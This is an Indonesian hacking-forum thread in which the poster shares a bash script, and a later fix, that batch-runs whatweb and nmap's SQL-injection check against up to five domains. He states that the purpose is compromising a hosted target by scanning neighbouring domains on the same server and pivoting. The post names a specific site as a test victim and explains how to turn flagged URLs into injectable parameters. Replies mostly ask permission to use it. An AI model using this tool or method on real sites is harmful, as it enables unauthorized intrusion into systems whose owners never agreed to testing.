> > > > >


SQLi Scanner Bash (sh)
koecroet Offline
<<-- yang punya naga
44 - 808
#1
05-23-2012, 07:46 PM
Assalamualaikum wr.wb
berawal dari tadi malem pas ane mau owned target yg menurut ane sudah tidak ada vulner, tetapi dia masih hostingan.
yasudah di scan lah domain2 yang satu server dengan domain target ane. karna rencana ane mau nge jumping.

tapiii bnyak banget domain di server itu, dan gk memungkinkan untuk mengscan satu2 dengan mengetik command nya. yaudah w buat aja bash sederhana ini, ada 2 step yaitu information gathering , lalu meng scan bug atau vulner SQLi (sql injection).

tools ini kita bisa menginput 5 victim sekaligus dalam satu kali scan pake tools ini. nanti akan di beritahu dia pake CMS apa lalu apakah domain yang kita scan itu seutuhnya (200) atau domain yang hanya akan di redirect (301) ?

oke deh langsung saja silahkan save dengan nama apaja.sh

Code:
#!/bin/bash

#this is opensource

#email : [email protected]

##################################################
#color
##################################################
lightgreen='\e[1;34m'
    lightblue='\e[1;34m'
blue='\e[0;34m'
    lightcyan='\e[1;36m'
yellow='\e[1;33m'
    red='\e[1;31m'
purple='\e[0;35m'
##################################################
#source
##################################################

    clear
{
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"
echo "=============================================================="
echo ""
    echo -ne $yellow "target 1 : "
    read website1
echo ""
echo "=============================================================="
echo ""
    echo -ne $lightcyan "target 2 : "
    read website2
echo ""
echo "=============================================================="
echo ""
    echo -ne $lightgreen "target 3 : "
    read website3
echo ""
echo "=============================================================="
echo ""
    echo -ne $lightblue "target 4 : "
    read website4
echo ""
echo "=============================================================="
echo ""
echo -ne $purple "target 5 : "
    read website5
echo ""
echo "=============================================================="
echo -e $yellow "Information Gathering of $website1 ..."
if [ -d $website1 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website1
      
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Information Gathering of $website2 ..."
if [ -d $website2 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website2
      
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Information Gathering of $website3 ..."
if [ -d $website3 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website3
      
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Information Gathering of $website4 ..."
if [ -d $website4 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website4
      
fi
echo ""
echo "=============================================================="
echo -e $purple "Information Gathering of $website5 ..."
if [ -d $website5 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website5
fi
echo ""
echo "=============================================================="
echo ""
echo -e $yellow "Vulnerability Assesment of SQLi from $website1 ..."
echo -e $yellow ""
if    nmap --script=sql-injection $website1 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Vulnerability Assesment of SQLi from $website2 ..."
echo -e $lightcyan ""
if    nmap --script=sql-injection $website2 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Vulnerability Assesment of SQLi from $website3 ..."
echo -e $lightgreen ""
if    nmap --script=sql-injection $website3 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $lightblue "Vulnerability Assesment of SQLi from $website4 ..."
echo -e $lightblue ""
if    nmap --script=sql-injection $website4 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $purple "Vulnerability Assesment of SQLi from $website5 ..."
echo -e $purple ""
if    nmap --script=sql-injection $website5 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
}

buat testing aja nih contoh victim: percikschool.com

sperti biasa please kalo mau edit2 jangan apus atau tinggalin nama authornya. biar anda gk dibilang plagiat

jika hasil bug sqli muncul seperti ini, maka kita harus memodif nya terlebih dahulu

Code:
/content.php?id=11'%20OR%20sqlspider&page=berita&act=showdetail
ingat setelah tulisan sqlspider tanda "&" dipindahkan ke paling belakang. lalu setelah tulisan spider di copy ke depan setelah tanda tanya. maka akan tertulis seperti ini yang benar:
Code:
/content.php?page=berita&act=showdetail&id=11


################## FIX ################################# FIX ####################

berhubung ini thread ngangkat lagi hehe. ane kasih perbaikan untuk nmap versi terbarunya ya.
Code:
#!/bin/bash

#this is opensource

#email : [email protected]

##################################################
#color
##################################################
lightgreen='\e[1;34m'
    lightblue='\e[1;34m'
blue='\e[0;34m'
    lightcyan='\e[1;36m'
yellow='\e[1;33m'
    red='\e[1;31m'
purple='\e[0;35m'
##################################################
#source
##################################################

    clear
{
echo "
..######...#######..##.......####.....######...######.....###....##....##
.##....##.##.....##.##........##.....##....##.##....##...##.##...###...##
.##.......##.....##.##........##.....##.......##........##...##..####..##
..######..##.....##.##........##......######..##.......##.....##.##.##.##
.......##.##..##.##.##........##...........##.##.......#########.##..####
.##....##.##....##..##........##.....##....##.##....##.##.....##.##...###
..######...#####.##.########.####.....######...######..##.....##.##....##"
echo ""
echo "This tools can help you to know about your target."
echo "work at two steps: Information Gathering & Vulnerability Assesment (only SQLi)"
echo "and you can input a target to this tools up to 5."
echo "now! lets do it!."
echo "[C] Copyright by KoecroeT."
echo "########################################################"
echo ""
echo "You can input domain what u want to scan : ... "
echo "before that, please follow the rules!"
echo "Please input without http://"
echo "example: "
echo "http://victim.com <<< [that's wrong]"
echo "victim.com <<< [that's right]"
echo "=============================================================="
echo ""
    echo -ne $yellow "target 1 : "
    read website1
echo ""
echo "=============================================================="
echo ""
    echo -ne $lightcyan "target 2 : "
    read website2
echo ""
echo "=============================================================="
echo ""
    echo -ne $lightgreen "target 3 : "
    read website3
echo ""
echo "=============================================================="
echo ""
    echo -ne $lightblue "target 4 : "
    read website4
echo ""
echo "=============================================================="
echo ""
echo -ne $purple "target 5 : "
    read website5
echo ""
echo "=============================================================="
echo -e $yellow "Information Gathering of $website1 ..."
if [ -d $website1 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website1
      
fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Information Gathering of $website2 ..."
if [ -d $website2 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website2
      
fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Information Gathering of $website3 ..."
if [ -d $website3 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website3
      
fi
echo ""
echo "=============================================================="
echo -e $lightblue "Information Gathering of $website4 ..."
if [ -d $website4 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website4
      
fi
echo ""
echo "=============================================================="
echo -e $purple "Information Gathering of $website5 ..."
if [ -d $website5 ]; then
    echo "Please Input your target"
else
    cd /pentest/enumeration/web/whatweb/ && ./whatweb $website5
fi
echo ""
echo "=============================================================="
echo ""
echo -e $yellow "Vulnerability Assesment of SQLi from $website1 ..."
echo -e $yellow ""
if    nmap --script=http-sql-injection $website1 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $lightcyan "Vulnerability Assesment of SQLi from $website2 ..."
echo -e $lightcyan ""
if    nmap --script=http-sql-injection $website2 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $lightgreen "Vulnerability Assesment of SQLi from $website3 ..."
echo -e $lightgreen ""
if    nmap --script=http-sql-injection $website3 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $lightblue "Vulnerability Assesment of SQLi from $website4 ..."
echo -e $lightblue ""
if    nmap --script=http-sql-injection $website4 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
echo "=============================================================="
echo -e $purple "Vulnerability Assesment of SQLi from $website5 ..."
echo -e $purple ""
if    nmap --script=http-sql-injection $website5 |grep sqlspider
  then
    echo "Founded SQLi Vulnerability"
else
    echo "Not Vulnerable SQLi"
   fi
echo ""
}

thanks before 17-agustus-2013
[shcode=This_site_xss-ed]
(This post was last modified: 08-17-2013, 09:03 PM by koecroet.)  
Website Find
Reply

ekawithoutyou Away
just suramer
25 - 836
#2
05-23-2012, 07:49 PM
comot dulu PERTAMAXX Confused
Every Second, Every Minutes, Every Hours, Every Days Its Never End
 
Find
Reply

iKONspirasi Offline
Sysadmin
56 - 2,544
#3
05-23-2012, 07:51 PM
wuiih tambah jago aja nih momod yg satu ini Big Grin
+2 dari ane bro karena buat sndiri Smile
I'm @ikonspirasi - Facebook
Personal blog: http://ikonspirasi.net
 
Website Find
Reply

fake666 Offline
Share
12 - 243
#4
05-23-2012, 07:53 PM
keren nih
ijin sedot ya om Big Grin
<< back|track'ers newbee
 
Website Find
Reply

childiez Offline

0 - 4
#5
05-23-2012, 08:29 PM
nice share om...

ijin dicoba

^_^
 
Find
Reply

ekawithoutyou Away
just suramer
25 - 836
#6
05-23-2012, 08:48 PM
nah ketemu juga idnya wkwkwk Tongue
Every Second, Every Minutes, Every Hours, Every Days Its Never End
 
Find
Reply

iyan squid Offline
Time To Revolution
44 - 322
#7
05-23-2012, 08:55 PM
yang ginian ne y ane tunggu2 heheheh , ijin pake om, Smile
aceh.indonesianbacktrack.or.id

 
Website Find
Reply

permana Offline
Share
13 - 253
#8
05-23-2012, 09:30 PM
Hasil Penggabungan Whatweb sama Nmap . . Big Grin

Nice sharing Big Grin
pengguna baru Imoet
 
Find
Reply

zasad Offline

2 - 24
#9
05-23-2012, 10:37 PM
ijin nyedoooot aaah Smile eh tapi cara pake nya bijimana???? Angry
Talent does what it can, genius does what it must.
 
Website Find
Reply

koecroet Offline
<<-- yang punya naga
44 - 808
#10
05-23-2012, 10:41 PM
(05-23-2012, 10:37 PM)zasad Wrote: ijin nyedoooot aaah Smile eh tapi cara pake nya bijimana???? Angry

tinggal input target aja kok om terus enter deh Big Grin
[shcode=This_site_xss-ed]
 
Website Find
Reply






Users browsing this thread: 1 Guest(s)